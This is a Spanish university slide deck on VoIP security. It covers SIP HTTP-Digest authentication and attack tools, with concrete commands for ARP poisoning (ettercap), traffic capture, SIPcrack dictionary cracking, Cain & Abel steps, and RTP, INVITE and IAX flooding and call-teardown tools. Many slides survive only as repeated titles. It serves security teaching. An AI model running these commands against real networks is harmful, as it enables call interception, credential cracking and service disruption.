Professional Documents
Culture Documents
Seguridad en Telefona IP
Seguridad en VoIP
Vulnerabilidades y medidas de proteccin
Pablo Garaizar Sagarminaga garaizar@eside.deusto.es
Seguridad en Telefona IP
Seguridad en Telefona IP
Problemas de QoS.
VoIP es mucho ms exigente que el trfico de datos.
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
IPsec y VoIP.
Seguridad en Telefona IP
HTTP-Digest en VoIP
HTTP-Digest es el mtodo de autenticacin para VoIP:
Ms sencillo. Ms eficiente:
Ancho de banda. Procesamiento (CPU).
Ms inseguro :-)
Seguridad en Telefona IP
HTTP-Digest en VoIP
Funcionamiento:
Se genera un texto concreto (lo que se conoce como digest) como desafo y se enva al usuario que se quiere autenticar. El usuario lo cifra utilizando su contrasea y lo enva como respuesta.. Si el cifrado es correcto, el autenticador podr descifrarlo correctamente al recibir la respuesta y compararlo con el digest original. El desafo cifrado empleado se usa como base para calcular una PMK (Pre-Master Key).
Seguridad en Telefona IP
HTTP-Digest en VoIP
Dentro de un desafo existen varios campos diferenciados:
realm: identifica las credenciales dentro de un mensaje SIP. Normalmente es el dominio del cual el servidor proxy SIP es responsable. qop: significa proteccin de la calidad. Especifica qu esquemas de proteccin soporta el servidor. nonce: string generado de forma nica cada vez que un servidor genera un desafo digest. Se genera a partir de un dato arbitrario y una marca de tiempo. opaque: string similar a una SYNCookie. algorithm: por el momento slo est soportado MD5.
Seguridad en Telefona IP
HTTP-Digest en VoIP
Ejemplo:
Desafo:
Digestrealm="iptel.org",qop="auth,authint", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",opaque="", algorithm=MD5
Respuesta:
Digestusername="jan",realm="iptel.org", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="sip:iptel.org",qop=auth,nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1",opaque=""
Seguridad en Telefona IP
HTTP-Digest en VoIP
Herramientas para cracking HTTP-Digest:
GNU/Linux:
SIPcrack.
MS Windows:
Cain & Abel.
Seguridad en Telefona IP
HTTP-Digest en VoIP
SIPcrack:
Herramienta programada por Martin J. Mnch (http://www.codito.de/) que incorpora dos programas diferentes:
sipdump: para capturar el trfico relativo a la autenticacin SIP dentro de un fichero de trfico. sipcrack: para atacar criptogrficamente el desafo contenido en la autenticacin.
Seguridad en Telefona IP
HTTP-Digest en VoIP
SIPcrack, uso:
ARP Poison para capturar el trfico:
echo 1 > /proc/sys/net/ipv4/ip_forward ettercap -o -T -P repoison_arp -M arp:remote /192.168.0.1/ / 192.168.0.2/
Captura de trfico:
tshark -i eth0 -w captura.pcap ip host 192.168.0.2
Seguridad en Telefona IP
HTTP-Digest en VoIP
SIPcrack, uso:
Cracking de diccionario:
sipcrack -d sip.pcap -w /usr/share/dict/spanish
Seguridad en Telefona IP
HTTP-Digest en VoIP
Cain & Abel:
Desarrollado por Massimiliano Montoro (http://www.oxid.it) Recuperador de contraseas para sistemas operativos Microsoft. Ha ido incorporando mltiples funcionalidades a lo largo del tiempo como:
Ataques de ARP Poison. Man-in-the-middle. Anlisis de trfico HTTPS o SSHv1, etc.
Entre sus caractersticas tambin destaca su capacidad para atacar a HTTP-Digest dentro de paquetes SIP.
Seguridad en Telefona IP
HTTP-Digest en VoIP
Cain & Abel, uso:
ARP Poison:
Pulsamos el botn "Start/Stop Sniffer". Pulsamos el botn "Add to list". Realizamos un escaneo automtico y seleccionamos el cliente VoIP y la PBX. Dentro de la pestaa ARP Poison Routing, aadimos a los dos hosts involucrados.
Seguridad en Telefona IP
HTTP-Digest en VoIP
Cain & Abel:
Seguridad en Telefona IP
HTTP-Digest en VoIP
Cain & Abel:
Capturar trfico HTTP-Digest:
En la pestaa Passwords vemos si se ha capturado alguna.
Crackear HTTP-Digest:
Seleccionamos la contrasea capturada (pestaa Passwords), pulsamos botn derecho y elegimos Send to Cracker.
Seguridad en Telefona IP
HTTP-Digest en VoIP
Cain & Abel:
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
MS Windows:
Cain & Abel.
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Despus de ser decodificado, el audio es guardado en ficheros WAV mono o estreo en el disco duro.
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
SIPp:
sipp 192.168.0.2
Seguridad en Telefona IP
Seguridad en Telefona IP
RTPflood:
rtpflood 192.168.0.3 192.168.0.2 8000 8002 1000000 15000 2000 1886986910
INVITEflood:
inviteflood eth0 500 192.168.0.2 192.168.0.2 1000000 -a hacker
Seguridad en Telefona IP
IAXflood:
iaxflood 192.168.0.3 192.168.0.2 10000000
SIP-kill:
sip-kill.pl -ieth0 -mBYE
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
Seguridad en Telefona IP
SPIT
SPIT es SPam over Ip Telephony, spam a travs de VoIP. En las redes VoIP hay dos tipos de spam posible:
De voz: mensajes comerciales. De IM, mensajera instantnea:
Malware. Mensajes comerciales.
Seguridad en Telefona IP
SPIT
Las soluciones actuales son similares a las empleadas contra el spam de correo electrnico:
SPF: Sender Policy Framework. DomainKeys. Greylists: listas grises. ...
Seguridad en Telefona IP
SPIT
Hay herramientas bsicas de generacin de SPIT:
Spitter:
Se emplea conjuntamente con Asteriks. Es preciso definir contextos y un dialplan para los spitters. Actualmente es beta y solamente se desarrolla con intereses educacionales.
Seguridad en Telefona IP
Referencias
Presentaciones y trabajos de Irontec, Sara Rincn, Mara Unda, David Castellanos, Gaizka Isusquiza, Marcelo Pelln, Digium, Cisco, KTH de Suecia, publicaciones en IEEE y ACM, OReilly, VoIP Hacking, Syngress. Todas las imgenes son propiedad de sus respectivos dueos.